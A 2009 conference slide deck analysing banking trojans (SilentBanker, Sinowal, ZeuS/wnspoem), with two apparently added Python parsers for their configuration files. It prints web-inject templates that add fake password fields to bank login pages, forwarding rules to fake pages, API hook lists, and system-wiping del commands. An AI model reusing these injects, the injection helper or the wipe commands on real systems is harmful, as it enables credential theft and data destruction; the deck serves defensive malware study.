Common Browser Hijacking Methods - TERENA · 2009-05-20 · Browser Hijacking is actively used in...
Common Browser Hijacking Methods
David Barroso, TERENA Meeting, León
Agenda
• Browser Hijacking
• Examples: SilentBanker, Sinowal, Wnspoem
• Kill the Operating System
• Summary
Browser Hijacking
Definition
“Browser hijacking is the modification of a web browser’s settings by malicious code. The term ‘hijacking’ is used as the changes are performed without the user’s permission” (Wikipedia). Additionally, the malicious code can modify the HTML rendered in the browser in order to lure the user.
Why are they asking for so much data?
Examples
SilentBanker
Date: 2007
Method: Browser Helper Object
Technique: Real-time HTML injection and HTML forwarding
Infection: drive-by exploits
Misc: more than 75 mutations
SilentBanker: Flow Diagram
SilentBanker: BHO Installation
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
@="Microsoft Shared Library Object Version"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\InprocServer32]
@="C:\\WINDOWS\\system32\\mfc42dx1.dll"
"ThreadingModel"="Apartment"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\ProgID]
@="SharedObject.SharedObjectVersion.1"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\TypeLib]
@="{5F226421-415D-408D-9A09-0DCD94E25B48}"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\VersionIndependentProgID]
@="SharedObject.SharedObjectVersion"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
SilentBanker: Configuration File
Get X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=10&v=21&b=6&z=12705442
SilentBanker: Configuration File
The encrypted configuration file includes:
• Additional configuration sources
• Dropsite URL
• Update URL
• Data encryption key
[dfgdf]
Bg1=X.Y.67.30/~ipcount/ww6/getcfg.php
Bg2=A.B.100.103/ww6/getcfg.php
[nbmx]
Bg1=X.Y.67.30/~ipcount/ww6/data.php
Bg2=A.B.100.103/ww6/data.php
[kjew]
Bg1=X.Y.67.30/~ipcount/ww6/file.exe
Bg2=A.B.100.103/ww6/file.exe
[sdfs]
secd=08000000B7B613F1F56F5BC7EDAEDEEFD2ABB1D38B2BA1014A585…
SilentBanker: Injection Configuration
Get X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=20&v=21&b=6&z=12705442
[jhw18]
pok=insert
qas=passport.yandex.ru/passport
njd=3ECFE0F0EEEBFC3A3C28
dfr=9
xzn=3C2367653E69
xzq=5
rek=202020203C676520696E797674612122676263223E0D0A202020203223ECFEBE0F2E5E6EDFBE920EFE0F0EEEBFC3A3C2367713E0D0A202020203C6771206A767167752122292431222070796E666621227661636867223E0D0A202020203C766163686720676C63722122636E66666A6265712220616E7A722122636E66666…
req=331
Field  Meaning
pok    Action
qas    Target URL
njd    Begin replacement token
dfr    Number of characters in njd, minus 1
xzn    End replacement token
xzq    Number of characters in xzn, minus 1
rek    HTML code injected
req    Number of characters in rek, minus 1

Action   Meaning
insert   insert injected HTML code between tokens
delete   delete HTML code in xzn
replace  replace HTML code in xzn
subreq   substitute xzn with rek
grab     extract field in xzn
SilentBanker: Injection Configuration
ROT-13 encoded (as stored in the configuration):
<ge inyvta!"gbc"><gq jvqgu!".1"><qvi fglyr!"jvqgu: ($ck;"><oe #><#qvi><#gq><gq jvqgu!"%+1" pynff!"ynory">Платежный пароль:<#gq><gq jvqgu!")$1" pynff!"vachg"><vachg glcr!"cnffjbeq" anzr!"cnffjq&" inyhr!"" fglyr!"jvqgu:)$1"
gnovaqrk!"&">2aofc;2aofc;<oe#> <#gq><gq jvqgu!"&)1"><oe><#gq><#ge>

Decoded with the ROT-13 algorithm:
<tr valign="top"><td width="8%"><div style="width: 40px;"><br /></div></td><td width="17%" class="label">Платежный пароль:</td><td width="50%" class="input"><input type="password" name="passwd2" value="" style="width:50%" tabindex="2
<br/> </td><td width="25%"><br></td></tr>
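A small parser for the SilentBanker injection record shown above, added here as an example (not the talk's or the malware's own code). It reads the key=value block, uses the slide's rule that dfr/xzq/req hold the token byte count minus one to flag records whose length fields do not match their payload, and un-ROT-13s the injected HTML. The sample record reuses the slide's njd/xzn values; its rek payload is a short constructed one, and the ROT-13 here rotates ASCII letters only, which is an assumption about the slide's "ROT-13 Algorithm".

```python
import codecs
from binascii import unhexlify

# Constructed sample record: section, action, target and njd/xzn are the slide's
# values; rek is a made-up ROT-13 fragment, hex-encoded like the real field.
SAMPLE_RECORD = """[jhw18]
pok=insert
qas=passport.yandex.ru/passport
njd=3ECFE0F0EEEBFC3A3C28
dfr=9
xzn=3C2367653E69
xzq=5
rek=3C676520696E797674613D22676263223E
req=16
"""

# hex-encoded token -> field that holds (number of bytes - 1), per the slide's table
LENGTH_FIELD = {"njd": "dfr", "xzn": "xzq", "rek": "req"}

def parse_record(text):
    """Parse one [section] block of key=value lines into a dict."""
    rec = {}
    for line in text.splitlines():
        if line.startswith("[") and line.endswith("]"):
            rec["section"] = line[1:-1]
        elif "=" in line:
            key, value = line.split("=", 1)
            rec[key] = value
    return rec

def check_lengths(rec):
    """Return the tokens whose declared length field is not len(bytes) - 1."""
    bad = []
    for token, length_key in LENGTH_FIELD.items():
        if token in rec and length_key in rec:
            if len(unhexlify(rec[token])) - 1 != int(rec[length_key]):
                bad.append(token)
    return bad

def rot13(data):
    """ROT-13 over ASCII letters only (assumption); other bytes pass through."""
    return codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")

def decode_record(rec):
    """Hex-decode the begin token (Windows-1251 text for this Russian target)
    and recover the injected HTML from rek."""
    return {"njd": unhexlify(rec["njd"]).decode("cp1251"),
            "html": rot13(unhexlify(rec["rek"])).decode("cp1251")}
```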
SilentBanker: Original Webpage
SilentBanker: Modified Webpage
Sinowal/Anserin/Torpig
Date: 2005
Method: Code Injection
Technique: Real-time HTML injection and HTML forwarding
Infection: drive-by exploits and email
Misc: infects the Master Boot Record (MBR) to stay stealthy
Sinowal: Injection
Sinowal does not have a configuration file with details about all the injections. Each time the user connects to one of the specific sites, Sinowal asks its injection server for instructions.
Sinowal: Injection Example
GET host/Key/EncryptedData
GET host/EFAAC5AEB85FF1D1/MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1
Callouts on the slide: "Tell me the fake page path", "This is the targeted brand", "I want the answer encrypted"
Sinowal: Injection Example
Step 3: The injection server looks for the targeted brand:
UK   online*.lloydstsb.*        /miheld.ibc                    {www} /uk/lloyds/lloyds.php                  2 0 4
USA  onlineid.bankofamerica.com /cgi-bin/sso.login.controller* {www} /usa/bofa_pers/sso.login.php           2 0 3
ES   www*.bancopopular.es       /Bpemotor                      {www} /spain/bancopopular/bancopopular.php  2 0 2
Sinowal: Injection Example
Step 4: the injection server answers:
www*.bancopopular.es /Bpemotor /spain/bancopopular/bancopopular.php 2 0 5 1
/spain/bancopopular/bancopopular.php: this is the fake page path
2: you need a GET
0: number of visits to the real URL
5: number of injection attempts
1: injection enabled
Sinowal: Targeted URLs
HTTP Forwarding (Web Injects), targeted URLs per country:
• UK: 40
• DE: 47
• US: 65
• ES: 30
• IT: 18
• AT: 7
• TR: 44
• PL: 7
• AU: 26
• SK: 5
• NZ: 8
• NL: 4
• SG: 2
Wnspoem/PRG/ZeuS/Ntos
Date: 2006
Method: Code Injection
Technique: Real-time HTML injection and HTML forwarding
Infection: drive-by exploits

               Version 1   Version 2      Version 3   Version 4
Directory      wnspoem     sysproc64      twain_32    lowsec
Filename       ntos.exe    oembios.exe    twext.exe   sdra64.exe
Stolen data    audio.dll   sysproc86.sys  local.ds    local.ds
Configuration  video.dll   sysproc32.sys  user.ds     user.ds
Wnspoem: Famous Screenshots
Wnspoem: Flow Diagram
Wnspoem: Hooks
Wsock32.dll (FTP/POP3 capture): send, sendto, closesocket
Ws2_32.dll (FTP/POP3): send, sendto, WSASend, WSASendTo, closesocket
User32.dll (Keylogger): GetMessage, PeekMessage, GetClipboardData
Crypt32.dll (Certificates): PFXImportCertStore
Wininet.dll (Capture data, inject HTML): HttpSendRequest, InternetReadFile, InternetReadFileEx, InternetQueryDataAvailable, InternetCloseHandle, HttpQueryInfo
Ntdll.dll (Infect processes and hide files): NtCreateThread, LdrLoadDll, LdrGetProcedureAddress, NtQueryDirectoryFile
Wnspoem: Configuration File
set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GP
data_before
name="password"*</td>*</td>
data_end
data_inject
<td align="left" colspan="7" valign="bottom"></td></tr><tr><td class="textoHome" align="left">3. Clave de Transferencias</td><td width="20"><img src='/img4bog/px.gif' border='0' width="20" height="1"></td><td align="left"><input type="password" name="ESpass" maxlength="60" tabindex="3" class="TextoContenido"></td>
data_end
data_after
data_end

Configuration files in the latest wnspoem version use RC4 with 256-bit keys.
Wnspoem: Original Webpage
Wnspoem: Modified Webpage
Wnspoem: HTTP Forwarding
Some banks use security tokens or a second authentication factor more complex than a password. In this scenario, HTML injection is avoided, and the user is forwarded to a fake webpage, usually hosted on a compromised site.
Wnspoem: HTTP Forwarding
In the configuration file:
@https://*.barclays.co.uk/* https://*.barclays.co.uk/* http://compromisedhost.com/img/commons/barclay/index.php
@https://*.cajasur.es/* https://*.cajasur.es/* http://compromisedhost.com/img/commons/cajasur/index.php
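A parser for the wnspoem configuration format shown on the two preceding slides (the set_url / data_before / data_inject / data_after blocks and the "@" HTTP forwarding lines), written here as an added example rather than taken from the talk or the malware. It lists targeted URL masks, treats "*" as a wildcard (an assumption drawn from the masks on the slides), and shows where the injected field would land in a constructed page fragment; the sample config reuses the slide's URLs with an abbreviated data_inject block.

```python
import re
from dataclasses import dataclass

# Constructed sample in the slides' format; the injected HTML is abbreviated.
SAMPLE_CONFIG = """set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GP
data_before
name="password"*</td>*</td>
data_end
data_inject
<td>3. Clave de Transferencias</td><td><input type="password" name="ESpass"></td>
data_end
data_after
data_end
@https://*.barclays.co.uk/* https://*.barclays.co.uk/* http://compromisedhost.com/img/commons/barclay/index.php
"""
# Constructed login-form fragment standing in for the real bank page.
SAMPLE_PAGE = '<tr><td>2. Clave</td><td><input type="password" name="password"></td><td>&nbsp;</td></tr>'

@dataclass
class WebInject:
    url_mask: str
    flags: str
    before: str = ""   # HTML that must precede the injection point
    inject: str = ""   # HTML the bot inserts right after 'before'
    after: str = ""    # HTML that must follow the injection point

def parse_config(text):
    # returns ([WebInject, ...], [(url_mask, replace_mask, fake_url), ...])
    injects, forwards, section, buf = [], [], None, []
    for line in text.splitlines():
        if line.startswith("@"):                       # HTTP forwarding entry
            forwards.append(tuple(line[1:].split()[:3]))
        elif line.startswith("set_url"):
            _, mask, *flags = line.split()
            injects.append(WebInject(mask, "".join(flags)))
        elif line in ("data_before", "data_inject", "data_after"):
            section, buf = line[5:], []
        elif line == "data_end" and section:
            setattr(injects[-1], section, "\n".join(buf))
            section = None
        elif section:
            buf.append(line)
    return injects, forwards

def mask_to_regex(mask):
    # '*' is a wildcard (assumption); everything else is matched literally
    return re.compile(".*?".join(map(re.escape, mask.split("*"))), re.S)

def matching_injects(url, injects):
    return [wi for wi in injects if mask_to_regex(wi.url_mask).fullmatch(url)]

def apply_inject(html, wi):
    # insert wi.inject after the first 'before' match; False if no anchor found
    m = mask_to_regex(wi.before).search(html)
    return (html[:m.end()] + wi.inject + html[m.end():], True) if m else (html, False)
```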
Wnspoem: Fake Webpage
Wnspoem: Statistics
Analysis and statistics of configuration files: 750 configuration files (usually cfg.bin) analyzed, covering only wnspoem versions 1, 2 and 3.
Wnspoem: Top 10 TLD
Wnspoem: Targeted Brands
Wnspoem: Malicious Domains
Wnspoem: Malicious IP Addresses
Kill the Operating System
It is getting more common that, just after stealing the credentials, the operating system is remotely destroyed. This action makes the analysis more difficult, since it cannot be done remotely. The malicious code is not securely deleted from the system and can be recovered. One optimistic result is that the machine will be reformatted with a new and patched operating system.
Kill the Operating System
Nethell:
• Deletes NTDETECT.COM and ntldr
InfoStealer:
• Deletes \drivers\*.sys
• Deletes some registry keys (HKLM\Microsoft\Windows NT\CurrentVersion\Winlogon: Shell = Explorer.exe)
Wnspoem:
• Deletes HKCU, HKLM\Software and HKLM\System
Glacial Dracon:
• del /A:S /Q /F C:\\*.*
• del /S /Q %SYSTEMROOT% %PROGRAMFILES%
Summary
Browser Hijacking is actively used in fraud schemes. Targeted brands are all around the world. Currently, only Microsoft Windows users are affected (Internet Explorer and Firefox). Be suspicious if your browser is asking for too much information. Be more suspicious if your computer stops working just after your browser has asked for too much information ☺
Thanks
David Barroso
S21sec e-crime
[email protected]
http://blog.s21sec.com
lostinsecurity
THANK YOU VERY MUCH